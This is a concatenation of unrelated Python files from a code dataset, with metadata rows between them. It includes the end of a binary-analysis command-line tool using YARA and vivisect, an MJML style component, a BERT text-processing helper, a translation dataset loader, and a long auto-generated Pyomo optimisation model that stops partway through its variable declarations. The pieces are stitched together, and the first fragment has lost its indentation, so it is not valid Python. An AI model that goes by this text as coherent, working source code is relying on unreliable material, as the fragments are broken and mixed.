parser.add_argument('-f', '--force', help='Force a fresh analysis, no restoration of previous work', action="store_true")
parser.add_argument('-y', '--yara', help='Path to YARA DB to use to scan binary')
parser.add_argument('-viv', '--vivisect', help='Path to vivisect installation')
# create a configuration holder
configuration = Configuration()
# Start the fun part :)
args = parser.parse_args()
# if force flag is defined, change behaviour
if args.force:
configuration.force = True
# set YARA DB signature
if args.yara:
if os.path.isfile(args.yara):
configuration.signatures = args.yara
else:
print "ERROR: %s not found!" % args.yara
exit()
# TEST - save configuration for re-use
#configuration.save()
configuration.load()
# set Vivisect path and Initialize
# currently only vivisect is supported
# this code need to be changed if other libraries get supported later
if args.vivisect:
if os.path.isdir(args.vivisect):
sys.path.append(args.vivisect)
else:
print "ERROR: %s not found!" % args.vivisect
exit()
# Check if an output directory is set
binary = None
if args.binary:
if os.path.isfile(args.binary):
binary = args.binary
start_analysis(binary, configuration)
else:
print "You need to specify a file to analyze"
exit()
if __name__ == "__main__":
main()
# --------------------------------------------------------------------------- #
# That's all folk ;)
# --------------------------------------------------------------------------- # | 29.207493 | 152 | 0.651998 | 6,410 | 0.632462 | 0 | 0 | 0 | 0 | 0 | 0 | 5,191 | 0.512185 |
c7cf1b7d56bb02ccf14d9d4fb7fbc22544c1690f | 512 | py | Python | mjml/elements/head/mj_style.py | ESA-CCI-ODP/mjml-stub | ffd824923de85f3c02fca7f83ef6b540be048414 | [
"MIT"
]
| 23 | 2020-10-02T14:52:21.000Z | 2022-03-24T16:05:21.000Z | mjml/elements/head/mj_style.py | ESA-CCI-ODP/mjml-stub | ffd824923de85f3c02fca7f83ef6b540be048414 | [
"MIT"
]
| 17 | 2020-10-07T14:48:06.000Z | 2022-03-18T13:56:11.000Z | mjml/elements/head/mj_style.py | ESA-CCI-ODP/mjml-stub | ffd824923de85f3c02fca7f83ef6b540be048414 | [
"MIT"
]
| 8 | 2021-01-13T11:54:41.000Z | 2022-03-10T15:50:55.000Z |
from ._head_base import HeadComponent
__all__ = ['MjStyle']
class MjStyle(HeadComponent):
@classmethod
def default_attrs(cls):
return {
'inline' : '',
}
def handler(self):
add = self.context['add']
inline_attr = 'inlineStyle' if (self.get_attr('inline') == 'inline') else 'style'
if inline_attr == 'inlineStyle':
raise NotImplementedError('style inlining not supported yet')
add(inline_attr, self.getContent())
| 24.380952 | 89 | 0.597656 | 446 | 0.871094 | 0 | 0 | 105 | 0.205078 | 0 | 0 | 107 | 0.208984 |
c7cf29c510e55652c76da9423af99e7754022e49 | 3,399 | py | Python | model_zoo/official/nlp/bert/src/sample_process.py | i4oolish/mindspore | dac3be31d0f2c0a3516200f47af30980e566601b | [
"Apache-2.0"
]
| 2 | 2020-08-12T16:14:40.000Z | 2020-12-04T03:05:57.000Z | model_zoo/official/nlp/bert/src/sample_process.py | dilingsong/mindspore | 4276050f2494cfbf8682560a1647576f859991e8 | [
"Apache-2.0"
]
| null | null | null | model_zoo/official/nlp/bert/src/sample_process.py | dilingsong/mindspore | 4276050f2494cfbf8682560a1647576f859991e8 | [
"Apache-2.0"
]
| null | null | null | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""process txt"""
import re
import json
def process_one_example_p(tokenizer, text, max_seq_len=128):
"""process one testline"""
textlist = list(text)
tokens = []
for _, word in enumerate(textlist):
token = tokenizer.tokenize(word)
tokens.extend(token)
if len(tokens) >= max_seq_len - 1:
tokens = tokens[0:(max_seq_len - 2)]
ntokens = []
segment_ids = []
label_ids = []
ntokens.append("[CLS]")
segment_ids.append(0)
for _, token in enumerate(tokens):
ntokens.append(token)
segment_ids.append(0)
ntokens.append("[SEP]")
segment_ids.append(0)
input_ids = tokenizer.convert_tokens_to_ids(ntokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_len:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
ntokens.append("**NULL**")
assert len(input_ids) == max_seq_len
assert len(input_mask) == max_seq_len
assert len(segment_ids) == max_seq_len
feature = (input_ids, input_mask, segment_ids)
return feature
def label_generation(text="", probs=None, label2id_file=""):
"""generate label"""
data = [text]
probs = [probs]
result = []
label2id = json.loads(open(label2id_file).read())
id2label = [k for k, v in label2id.items()]
for index, prob in enumerate(probs):
for v in prob[1:len(data[index]) + 1]:
result.append(id2label[int(v)])
labels = {}
start = None
index = 0
for _, t in zip("".join(data), result):
if re.search("^[BS]", t):
if start is not None:
label = result[index - 1][2:]
if labels.get(label):
te_ = text[start:index]
labels[label][te_] = [[start, index - 1]]
else:
te_ = text[start:index]
labels[label] = {te_: [[start, index - 1]]}
start = index
if re.search("^O", t):
if start is not None:
label = result[index - 1][2:]
if labels.get(label):
te_ = text[start:index]
labels[label][te_] = [[start, index - 1]]
else:
te_ = text[start:index]
labels[label] = {te_: [[start, index - 1]]}
start = None
index += 1
if start is not None:
label = result[start][2:]
if labels.get(label):
te_ = text[start:index]
labels[label][te_] = [[start, index - 1]]
else:
te_ = text[start:index]
labels[label] = {te_: [[start, index - 1]]}
return labels
| 33.653465 | 78 | 0.562518 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 757 | 0.222713 |
c7d08a1b7fd50820c50ef7603b8e08a3f497a3ac | 2,273 | py | Python | lang_model/data_loader.py | alex44jzy/FancyALMLDLNLP | c55a67a51de72339f4ab13bd46008eb418d293a3 | [
"MIT"
]
| null | null | null | lang_model/data_loader.py | alex44jzy/FancyALMLDLNLP | c55a67a51de72339f4ab13bd46008eb418d293a3 | [
"MIT"
]
| null | null | null | lang_model/data_loader.py | alex44jzy/FancyALMLDLNLP | c55a67a51de72339f4ab13bd46008eb418d293a3 | [
"MIT"
]
| null | null | null | import torch
from torch.nn import functional as F
from torch.utils.data import Dataset
from gensim.corpora.dictionary import Dictionary
class LangDataset(Dataset):
def __init__(self, src_sents, trg_sents, max_len=-1):
self.src_sents = src_sents
self.trg_sents = trg_sents
# Create the vocabulary for both the source and target.
self.vocab = Dictionary(src_sents + trg_sents)
# Patch the vocabularies and add the <pad> and <unk> symbols.
special_tokens = {'<pad>': 0, '<unk>': 1, '</s>': 2}
self.vocab.patch_with_special_tokens(special_tokens)
# Keep track of how many data points.
self._len = len(src_sents)
if max_len < 0:
# If it's not set, find the longest text in the data.
max_src_len = max(len(sent) for sent in src_sents)
self.max_len = max_src_len
else:
self.max_len = max_len
def pad_sequence(self, vectorized_sent, max_len):
# To pad the sentence:
# Pad left = 0; Pad right = max_len - len of sent.
pad_dim = (0, max_len - len(vectorized_sent))
return F.pad(vectorized_sent, pad_dim, 'constant')
def __getitem__(self, index):
vectorized_src = self.vectorize(self.vocab, self.src_sents[index])
vectorized_trg = self.vectorize(self.vocab, self.trg_sents[index])
return {'x': self.pad_sequence(vectorized_src, self.max_len),
'y': self.pad_sequence(vectorized_trg, self.max_len),
'x_len': len(vectorized_src),
'y_len': len(vectorized_trg)}
def __len__(self):
return self._len
def vectorize(self, vocab, tokens):
"""
:param tokens: Tokens that should be vectorized.
:type tokens: list(str)
"""
# See https://radimrehurek.com/gensim/corpora/dictionary.html#gensim.corpora.dictionary.Dictionary.doc2idx
# Lets just cast list of indices into torch tensors directly =)
return torch.tensor(vocab.doc2idx(tokens, unknown_word_index=1))
def unvectorize(self, vocab, indices):
"""
:param indices: Converts the indices back to tokens.
:type tokens: list(int)
"""
return [vocab[i] for i in indices]
| 37.262295 | 114 | 0.635724 | 2,134 | 0.938847 | 0 | 0 | 0 | 0 | 0 | 0 | 709 | 0.311923 |
c7d12defacc5fa8896212434511fb502a03f0a3b | 74,691 | py | Python | models_nonconvex_simple2/ndcc13persp.py | grossmann-group/pyomo-MINLP-benchmarking | 714f0a0dffd61675649a805683c0627af6b4929e | [
"MIT"
]
| null | null | null | models_nonconvex_simple2/ndcc13persp.py | grossmann-group/pyomo-MINLP-benchmarking | 714f0a0dffd61675649a805683c0627af6b4929e | [
"MIT"
]
| null | null | null | models_nonconvex_simple2/ndcc13persp.py | grossmann-group/pyomo-MINLP-benchmarking | 714f0a0dffd61675649a805683c0627af6b4929e | [
"MIT"
]
| null | null | null | # MINLP written by GAMS Convert at 08/20/20 01:30:45
#
# Equation counts
# Total E G L N X C B
# 297 170 42 85 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 673 631 42 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 2479 2353 126 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x2 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x3 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x4 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x5 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x6 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x7 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x8 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x9 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x10 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x11 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x12 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x13 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x14 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x15 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x16 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x17 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x18 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x19 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x20 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x21 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x22 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x23 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x24 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x25 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x26 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x27 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x28 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x29 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x30 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x31 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x32 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x33 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x34 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x35 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x36 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x37 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x38 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x39 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x40 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x41 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x42 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x43 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x44 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x45 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x46 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x47 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x48 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x49 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x50 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x51 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x52 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x53 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x54 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x55 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x56 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x57 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x58 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x59 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x60 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x61 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x62 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x63 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x64 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x65 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x66 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x67 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x68 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x69 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x70 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x71 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x72 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x73 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x74 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x75 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x76 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x77 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x78 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x79 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x80 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x81 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x84 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x85 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x86 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x87 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x88 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x89 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x90 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x91 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x92 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x93 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x94 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x95 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x96 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x97 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x98 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x99 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x100 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x101 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x102 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x103 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x104 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x105 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x106 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x107 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x108 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x109 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x110 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x111 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x112 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x113 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x114 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x115 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x116 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x117 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x118 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x119 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x120 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x121 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x122 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x123 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x124 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x125 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x126 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x127 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x128 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x129 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x130 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x131 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x132 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x133 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x134 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x135 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x136 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x137 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x138 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x139 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x140 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x141 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x142 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x143 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x144 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x145 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x146 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x147 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x148 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x149 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x150 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x151 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x152 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x153 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x154 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x155 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x156 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x157 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x158 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x159 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x160 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x161 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x162 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x163 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x164 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x165 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x166 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x167 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x168 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x169 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x170 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x171 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x172 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x173 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x174 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x175 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x176 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x177 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x178 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x179 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x180 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x181 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x182 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x183 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x184 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x185 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x186 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x187 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x188 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x189 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x190 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x191 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x192 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x193 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x194 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x195 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x196 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x197 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x198 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x199 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x200 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x201 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x202 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x203 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x204 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x205 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x206 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x207 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x208 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x209 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x210 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x211 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x212 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x213 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x214 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x215 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x216 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x217 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x218 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x219 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x220 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x221 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x222 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x223 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x224 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x225 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x226 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x227 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x228 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x229 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x230 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x231 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x232 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x233 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x234 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x235 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x236 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x237 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x238 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x239 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x240 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x241 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x242 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x243 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x244 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x245 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x246 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x247 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x248 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x249 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x250 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x251 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x252 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x253 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x254 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x255 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x256 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x257 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x258 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x259 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x260 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x261 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x262 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x263 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x264 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x265 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x266 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x267 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x268 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x269 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x270 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x271 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x272 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x273 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x274 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x275 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x276 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x277 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x278 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x279 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x280 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x281 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x282 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x283 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x284 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x285 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x286 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x287 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x288 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x289 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x290 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x291 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x292 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x293 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x294 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x295 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x296 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x297 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x298 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x299 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x300 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x301 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x302 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x303 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x304 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x305 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x306 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x307 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x308 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x309 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x310 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x311 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x312 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x313 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x314 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x315 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x316 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x317 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x318 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x319 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x320 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x321 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x322 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x323 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x324 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x325 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x326 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x327 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x328 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x329 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x330 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x331 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x332 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x333 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x334 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x335 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x336 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x337 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x338 = Var(within=Reals,bounds=(0,None),initialize=0)
